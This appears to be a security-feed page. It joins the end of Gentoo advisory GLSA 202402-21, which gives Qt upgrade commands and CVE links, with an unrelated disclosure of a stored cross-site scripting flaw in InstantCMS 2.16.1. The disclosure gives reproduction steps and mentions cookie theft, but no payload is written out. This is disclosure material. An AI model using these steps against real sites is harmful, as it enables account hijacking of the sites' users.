Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Qt 5 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtnetwork-5.15.12-r1"

All Qt 6 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtbase-6.6.1-r2"

References  
==========

[ 1 ] CVE-2023-32762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32762  
[ 2 ] CVE-2023-51714  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51714

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-21

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

Tag

#web